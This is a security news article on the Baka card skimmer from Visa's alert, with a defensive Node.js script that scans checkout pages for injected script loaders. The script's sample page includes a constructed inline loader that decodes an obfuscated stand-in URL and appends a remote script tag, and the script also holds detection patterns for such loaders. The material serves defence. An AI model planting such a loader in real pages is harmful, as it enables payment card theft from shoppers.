The New Baka Card Skimmer
Baka is a relatively new e-commerce skimmer, first discovered in February 2020. Visa Payment Fraud Disruption (PFD) researchers found it while analysing a Command and Control (C2) server that had already been used in an earlier e-skimming campaign. Their findings led Visa to issue a security alert late last week to its partners and merchant stores.

The Baka skimmer is a sophisticated piece of software that uses several methods to load itself and avoid detection. First, the code is loaded dynamically at runtime rather than sitting in the merchant's page files, so a static malware scan of the site's files finds little or nothing. Second, as Visa's alert explains, the skimmer is believed to evade analysis by removing itself from memory when it "detects the possibility of dynamic analysis with Developer Tools or when data has been successfully exfiltrated." Finally, the malicious code is disguised as page-rendering code and "uses unique encryption parameters for each victim to obfuscate the malicious code"; the researchers also observed that the attackers could change the URL used for each victim. PFD researchers found the Baka skimmer on several merchant websites in various countries through Visa's eCommerce Threat Disruption (eTD) capability.
How does the Baka Skimmer Work?
The Baka skimmer itself is quite basic and offers functionality similar to other e-skimmers; it is the loader and its evasion tricks that stand out. E-skimming is also known as a "Magecart" attack. In such attacks, criminals gain access to an online store and inject skimming code into the pages that handle payment card entry. The data captured by a skimmer such as Baka includes personal information (name, date of birth, location and address), account numbers and account login credentials, as well as administrative credentials. The attackers then use this information to make fraudulent transactions or to make money by selling the stolen data on dark web markets.

Attackers typically get into a store by exploiting a known or previously unknown vulnerability in the e-commerce platform, by phishing staff, or by stealing or guessing administrative credentials. Once they have access, they plant the Baka loader, a small script that adds a script tag to the current page on the fly. That tag loads a remote JavaScript file whose URL is hard-coded into the loader in encrypted form, so the URL is not readable in the page source and the skimmer code itself never sits in the merchant's files. Once the loader has run, the skimmer steals payment card details from the online checkout form. Skimmers in general do this either by redirecting the buyer to a look-alike phishing page or by hooking the fields of the real payment page so that anything typed is copied to the attacker; Baka takes the latter approach and harvests what the shopper enters into the checkout form. When the payment card data has been exfiltrated, the skimmer removes itself from memory, which is why an inspection of the page after the fact may find only the loader.
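The injection pattern described above can be checked for in a captured copy of a checkout page. The following Node.js script is an added example written for this article; it is not code from Visa's alert or from the Baka malware, and the origins, the sample page and the inline "loader" in it are constructed for illustration. It pulls every script tag out of the HTML, flags external scripts whose origin is not on an allowlist, and flags inline scripts that show the loader behaviour the article describes (a script element created at runtime, a source assigned from decoded data, and the element appended to the document). Run on a schedule against the live page, the same check is the kind of recurring scan Visa's recommendations ask for.

```javascript
// Added example for this article (not Visa's or the Baka code): a static
// check of a checkout page for the script-injection pattern described above.
// All origins, the sample page and the inline "loader" below are constructed.

// Assumed first-party origin and the only origins allowed to serve scripts.
const PAGE_ORIGIN = 'https://shop.example';
const ALLOWED_SCRIPT_ORIGINS = new Set([
  'https://shop.example',        // the store itself (assumed)
  'https://cdn.example-psp.com', // payment service provider's CDN (assumed)
]);

// Indicators of a loader that builds a <script> element at runtime from
// decoded data: element creation, decoding, a src assignment, and insertion.
const LOADER_INDICATORS = [
  /createElement\s*\(\s*['"]script['"]\s*\)/i,
  /(?:atob|unescape|decodeURIComponent|String\.fromCharCode)\s*\(/,
  /\.src\s*=/,
  /\.(?:appendChild|insertBefore|append|prepend)\s*\(/,
];
const LOADER_THRESHOLD = 3; // indicators that must match before flagging

// Return every <script> tag in the document with its src (if any) and body.
function extractScripts(html) {
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcRe = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  const scripts = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const srcMatch = srcRe.exec(m[1]);
    scripts.push({
      src: srcMatch ? (srcMatch[1] ?? srcMatch[2] ?? srcMatch[3]) : null,
      body: m[2],
      offset: m.index,
    });
  }
  return scripts;
}

// Resolve a script URL against the page origin; null if it cannot be parsed.
function originOf(url, pageOrigin) {
  try {
    return new URL(url, pageOrigin).origin;
  } catch (e) {
    return null;
  }
}

// Audit a page: external scripts must come from an allowlisted origin, and
// inline scripts must not look like a dynamic loader.
function auditPage(html, pageOrigin = PAGE_ORIGIN, allowed = ALLOWED_SCRIPT_ORIGINS) {
  const findings = [];
  for (const s of extractScripts(html)) {
    if (s.src !== null) {
      const origin = originOf(s.src, pageOrigin);
      if (origin === null || !allowed.has(origin)) {
        findings.push({ kind: 'external-script-unlisted-origin', src: s.src, offset: s.offset });
      }
      continue;
    }
    const hits = LOADER_INDICATORS.filter((re) => re.test(s.body)).length;
    if (hits >= LOADER_THRESHOLD) {
      findings.push({ kind: 'inline-dynamic-loader', hits, offset: s.offset });
    }
  }
  return findings;
}

// Constructed sample page: two legitimate scripts, an injected loader whose
// remote URL is hidden in character codes (a stand-in for the encrypted URL
// the article describes), one unlisted third-party script, and a harmless
// inline snippet that must not be flagged.
const SAMPLE_PAGE = `<!doctype html>
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-psp.com/fields.js"></script>
<script>
var u = String.fromCharCode(104,116,116,112,115,58,47,47,120,46,105,110,118,97,108,105,100,47,108,46,106,115);
var s = document.createElement('script');
s.src = u;
document.head.appendChild(s);
</script>
<script src="https://static.unlisted-origin.invalid/pixel.js"></script>
</head><body>
<script>window.dataLayer = window.dataLayer || [];</script>
<form id="checkout"><input name="cardnumber"></form>
</body></html>`;

console.log(JSON.stringify(auditPage(SAMPLE_PAGE), null, 2));
```

Because the loader only references the remote file through an encrypted URL, a scan of the files deployed on the server sees at most this small loader, so the check should run against the page as a shopper's browser receives it, not against the code repository. A Content-Security-Policy header with a script-src allowlist, set at the web server or CDN rather than inside the page, applies the same origin check at runtime and stops a dynamically added script tag from loading anything outside the list.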
Visa Recommendations
As well as the alert, Visa has published a guide detailing what firms should do if they are compromised. The document is aimed at financial institutions, e-commerce merchants, service providers, third-party vendors, and integrator resellers. Visa also shared with firms the Best Practices for Securing E-commerce document, published by the PCI Security Standards Council. Finally, Visa has provided a list of mitigation measures that firms should adopt to help prevent their online stores being compromised. These include:
Run recurring checks in eCommerce environments
Closely vet utilized Content Delivery Networks (CDN) and other third-party resources
Regularly scan and test eCommerce sites for vulnerabilities and malware
Limit access to the administrative portal
Require strong administrative passwords
Consider using a fully hosted checkout solution
Implement best practices for securing eCommerce